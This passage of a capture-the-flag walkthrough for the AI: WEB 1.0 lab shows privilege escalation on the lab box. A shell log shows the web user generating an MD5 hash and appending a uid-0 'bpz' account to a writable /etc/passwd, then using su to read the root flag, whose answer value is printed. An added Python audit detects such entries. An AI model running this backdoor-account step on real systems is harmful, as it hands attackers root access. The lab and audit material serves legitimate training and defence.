- openssl passwd: an OpenSSL subcommand that generates a hashed password string.
- -1: use the MD5-based algorithm to hash the password.
- -salt: supply a "salt" for the hashing. The salt is a random or chosen string that is mixed in with the password so that the result is unique; here bpz is the salt value.
- bpz 123456: the account name (reused as the salt) and the password.

```
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ openssl passwd -1 -salt bpz 123456
$1$bpz$kTc/7rHp3uTJ2ou1W2Z/F1
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ echo 'bpz:$1$bpz$kTc/7rHp3uTJ2ou1W2Z/F1:0:0::/root:/bin/bash'>>/etc/passwd
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$
```

With the hash generated, the new passwd line containing it is appended to /etc/passwd, which creates the user.
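As an added defensive example that is not part of the original writeup: a small audit that catches both halves of this weakness, the passwd file being owned by a non-root user (what the ls -al line above shows) and the root-equivalent entry that a writable passwd lets anyone append. SAMPLE_PASSWD is constructed; its bpz line is the one written in the step above, the other lines are ordinary Ubuntu entries.

```python
import os
import stat

# Constructed sample of /etc/passwd after the step above appended a uid-0
# 'bpz' entry. Only the bpz line comes from the walkthrough.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
bpz:$1$bpz$kTc/7rHp3uTJ2ou1W2Z/F1:0:0::/root:/bin/bash
"""


def audit_passwd_entries(text):
    """Return (line number, account, issue) for every suspicious passwd entry."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            # A second uid-0 account is a root-equivalent backdoor.
            findings.append((lineno, name, "extra uid-0 account"))
        if pw == "":
            findings.append((lineno, name, "empty password field"))
        elif pw not in ("x", "*", "!"):
            # Hashes belong in /etc/shadow; a hash here is world-readable and,
            # on this box, was planted by an unprivileged web user.
            findings.append((lineno, name, "password hash stored in passwd"))
    return findings


def audit_ls_line(ls_line):
    """Check one `ls -l` line: passwd must be root-owned and not group/world writable."""
    mode, _links, owner, _group = ls_line.split()[:4]
    issues = []
    if owner != "root":
        issues.append("not owned by root")
    if mode[5] == "w" or mode[8] == "w":
        issues.append("group/world writable")
    return issues


def audit_file_perms(path):
    """The same ownership and mode check against a live file via stat(2)."""
    st = os.stat(path)
    issues = []
    if st.st_uid != 0:
        issues.append("not owned by root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append("group/world writable")
    return issues


if __name__ == "__main__":
    for finding in audit_passwd_entries(SAMPLE_PASSWD):
        print("line %d: %s: %s" % finding)
    print(audit_ls_line("-rw-r--r-- 1 www-data www-data 1664 Aug 21 2019 /etc/passwd"))
```

On the target, audit_ls_line reports only "not owned by root", which is exactly the condition that let www-data append the bpz entry; the fix is chown root:root /etc/passwd with mode 0644.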

Log in as the bpz user and get the flag.

### Logging in

su bpz

123456

### Finding the flag's path

find / -name flag*

```
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ su bpz
Password: 123456
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# find / -name flag*
/usr/src/linux-headers-4.15.0-58/scripts/coccinelle/locks/flags.cocci
/usr/src/linux-headers-4.15.0-58-generic/include/config/arch/uses/high/vma/flags.h
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
/sys/devices/pnp0/00:07/tty/ttyS1/flags
/sys/devices/pnp0/00:06/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS15/flags
/sys/devices/platform/serial8250/tty/ttyS6/flags
/sys/devices/platform/serial8250/tty/ttyS23/flags
/sys/devices/platform/serial8250/tty/ttyS13/flags
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/devices/platform/serial8250/tty/ttyS4/flags
/sys/devices/platform/serial8250/tty/ttyS21/flags
/sys/devices/platform/serial8250/tty/ttyS11/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS28/flags
/sys/devices/platform/serial8250/tty/ttyS18/flags
/sys/devices/platform/serial8250/tty/ttyS9/flags
/sys/devices/platform/serial8250/tty/ttyS26/flags
/sys/devices/platform/serial8250/tty/ttyS16/flags
/sys/devices/platform/serial8250/tty/ttyS7/flags
/sys/devices/platform/serial8250/tty/ttyS24/flags
/sys/devices/platform/serial8250/tty/ttyS14/flags
/sys/devices/platform/serial8250/tty/ttyS5/flags
/sys/devices/platform/serial8250/tty/ttyS22/flags
/sys/devices/platform/serial8250/tty/ttyS12/flags
/sys/devices/platform/serial8250/tty/ttyS30/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS20/flags
/sys/devices/platform/serial8250/tty/ttyS10/flags
/sys/devices/platform/serial8250/tty/ttyS29/flags
/sys/devices/platform/serial8250/tty/ttyS19/flags
/sys/devices/platform/serial8250/tty/ttyS27/flags
/sys/devices/platform/serial8250/tty/ttyS17/flags
/sys/devices/platform/serial8250/tty/ttyS8/flags
/sys/devices/platform/serial8250/tty/ttyS25/flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:00.0/net/ens32/flags
/sys/devices/virtual/net/lo/flags
/root/flag.txt
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# cat /root/flag.txt
####################################################
#                                                  #
#                   AI: WEB 1.0                    #
#                                                  #
#               Congratulation!!!                  #
#                                                  #
#         Thank you for penetrate my system.       #
#                                                  #
#              Hope you enjoyed this.              #
#                                                  #
#                                                  #
#  flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71}  #
#                                                  #
####################################################
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads#
```

cat /root/flag.txt gives the flag: flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71}


